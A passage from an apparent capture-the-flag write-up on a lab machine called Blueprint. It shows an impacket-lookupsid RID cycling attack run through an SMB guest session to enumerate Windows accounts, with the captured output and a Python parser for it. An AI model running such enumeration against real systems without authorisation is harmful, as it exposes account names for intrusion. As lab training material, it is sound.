RID Cycling
The target SMB server allows a guest session with read access to the IPC$ share.
This means a RID cycling attack can be employed to brute-force RIDs over the LSARPC named pipe and resolve them to account names.
┌──(kali㉿kali)-[~/archive/thm/blueprint]
└─$ impacket-lookupsid blah@$IP 100000
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at 10.10.136.191
[*] StringBinding ncacn_np:10.10.136.191[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3130159037-241736515-3168549210
500: BLUEPRINT\Administrator (SidTypeUser)
501: BLUEPRINT\Guest (SidTypeUser)
513: BLUEPRINT\None (SidTypeGroup)
1000: BLUEPRINT\Lab (SidTypeUser)
1001: BLUEPRINT\TelnetClients (SidTypeAlias)
Performing the RID cycling attack with an arbitrary credential (the user `blah` with a throwaway password `blahblah`) against the target SMB service, the `Lab` account has been identified.
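As an added example that is not part of the original writeup, the following Python parser reads the impacket-lookupsid output shown above, reconstructs each account's full SID from the domain SID, and separates well-known RIDs (below 1000) from locally created ones, which is what makes the Lab account stand out; the sample text is constructed from the session above.

```python
import re

# Constructed sample: the lookupsid output from the session above.
LOOKUPSID_OUTPUT = """\
[*] Brute forcing SIDs at 10.10.136.191
[*] StringBinding ncacn_np:10.10.136.191[\\pipe\\lsarpc]
[*] Domain SID is: S-1-5-21-3130159037-241736515-3168549210
500: BLUEPRINT\\Administrator (SidTypeUser)
501: BLUEPRINT\\Guest (SidTypeUser)
513: BLUEPRINT\\None (SidTypeGroup)
1000: BLUEPRINT\\Lab (SidTypeUser)
1001: BLUEPRINT\\TelnetClients (SidTypeAlias)
"""

DOMAIN_SID_RE = re.compile(r"Domain SID is: (S-1-5-21-\d+-\d+-\d+)")
# "<rid>: <domain>\<name> (<SidType...>)"
ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)$")


def parse_lookupsid(text):
    """Return (domain_sid, entries); each entry has rid, domain, name, sid_type, sid."""
    domain_sid = None
    entries = []
    for line in text.splitlines():
        m = DOMAIN_SID_RE.search(line)
        if m:
            domain_sid = m.group(1)
            continue
        m = ENTRY_RE.match(line.strip())
        if m and domain_sid:
            rid = int(m.group(1))
            entries.append({
                "rid": rid,
                "domain": m.group(2),
                "name": m.group(3),
                "sid_type": m.group(4),
                # Full SID = domain SID + "-" + RID
                "sid": f"{domain_sid}-{rid}",
            })
    return domain_sid, entries


def custom_user_accounts(entries):
    """User accounts created on the host: Windows assigns RIDs >= 1000 to them,
    while RIDs below 1000 are well-known (500 Administrator, 501 Guest, 513 None/Domain Users)."""
    return [e["name"] for e in entries if e["sid_type"] == "SidTypeUser" and e["rid"] >= 1000]
```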